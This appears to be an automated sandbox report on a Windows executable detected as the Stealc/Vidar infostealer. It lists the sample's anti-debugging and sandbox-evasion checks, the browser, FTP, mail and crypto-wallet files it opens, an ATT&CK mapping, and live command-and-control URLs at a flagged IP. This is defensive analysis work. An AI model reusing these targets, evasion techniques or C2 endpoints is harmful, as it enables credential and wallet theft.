Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_003CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_003D3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_003D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003CDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003C1160 GetSystemInfo,ExitProcess,

0_2_003C1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: GCBFBGCG.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: GCBFBGCG.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: GCBFBGCG.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: GCBFBGCG.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: GCBFBGCG.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1663758105.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: GCBFBGCG.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: GCBFBGCG.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: GCBFBGCG.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: GCBFBGCG.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: GCBFBGCG.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: GCBFBGCG.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: GCBFBGCG.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: GCBFBGCG.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: GCBFBGCG.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: GCBFBGCG.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: GCBFBGCG.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: GCBFBGCG.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: GCBFBGCG.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: GCBFBGCG.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: GCBFBGCG.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59424
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58234
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58237
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58255
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58249
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58289

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBE5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CBE5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003C45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003C45C0

Source: C:\Users\user\Desktop\file.exe

0_2_003D9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9750 mov eax, dword ptr fs:[00000030h]

0_2_003D9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003D7850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CBBB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CBBB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_003D9600

Source: file.exe, file.exe, 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBBB341 cpuid

0_2_6CBBB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_003D7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_003D6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_003D7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_003D7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1436762583.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: Exodus
Source: file.exe, 00000000.00000002.1663758105.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fpt5
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: MultiDoge
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1663758105.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.`

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1436762583.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1663758105.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7608, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/	100%	Avira URL Cloud	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://185.215.113.37	100%	Avira URL Cloud	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll/~	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll5	100%	Avira URL Cloud	malware
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.phpp	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpq	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dlla	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phps	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpe	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpj	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://185.215.113.37h	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpM	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpinomi	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpY	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
